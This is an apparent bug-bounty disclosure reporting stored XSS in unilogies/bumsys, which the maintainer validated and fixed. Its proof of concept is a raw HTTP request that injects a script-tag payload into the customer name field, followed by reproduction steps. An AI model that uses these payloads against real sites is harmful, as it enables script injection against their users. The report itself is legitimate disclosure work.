Multiple XSS on update funtions with module select options and search form in unilogies/bumsys

Valid

Reported on

Mar 29th 2023


Description

XSS vulnerability occurs in forms have select and search

Proof of Concept

POST /bumsys/xhr/?module=peoples&page=updateCustomer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------308170463032889995491505595073
Content-Length: 2215
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/peoples/customer-list/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerName"

test2"><script>alert('edit')</script>
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerNameLocalLen"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerType"

Distributor
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPhone"

123
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerEmail"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerOpeningBalance"

11.00
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerShippingRate"

0.0000
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDiscount"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerSendNotification"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDivision"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDistrict"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerUpazila"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPostalCode"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerCountry"

Bangladesh
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerWebsite"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerAddress"

  
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customer_id"

3
-----------------------------308170463032889995491505595073--

Ajax Loader:

GET /bumsys/xhr/?module=my-shop&page=editDiscount&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/bumsys/my-shop/discounts/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Step 1. Create a new customer without payload alt text for screen readers View list customer alt text for screen readers
Step 2. Add a discount on My Shop alt text for screen readers
Step 3. Edit customer name alt text for screen readers View list customer after editor alt text for screen readers
Step 4. Edit discounts and view alert alt text for screen readers
Please check all funtion ajax module, html_entity_decode

Impact

In general, stored XSS occurs when an attacker injects malicious content (often referred to as the “payload”) as user input and it is stored on the target server, such as in a message forum, comment field, visitor log, database, etc.

When the victim opens the web page in a browser, the malicious data is served to the victim’s browser like any other legitimate data, and the victim ends up executing the malicious script once it is viewed in their browser.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 2 months ago
Khurshid Alam validated this vulnerability 2 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
TuanTH
2 months ago

Researcher


Can you assign a CVE for this vulnerability please? It would be very nice

Khurshid Alam
2 months ago

Thank you. we are working with some functionality. We will update soon. Thanks

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
ajax.php#L543-L610 has been validated
ajax.php#L1209-L1253 has been validated
ajax_select2.php#L677-L706 has been validated
ajax.php#L78-L178 has been validated
ajax.php#L2158-L2208 has been validated
Khurshid Alam
a month ago

@admin, please assign a CVE.

Pavlos
23 days ago

Admin


ok :)

to join this conversation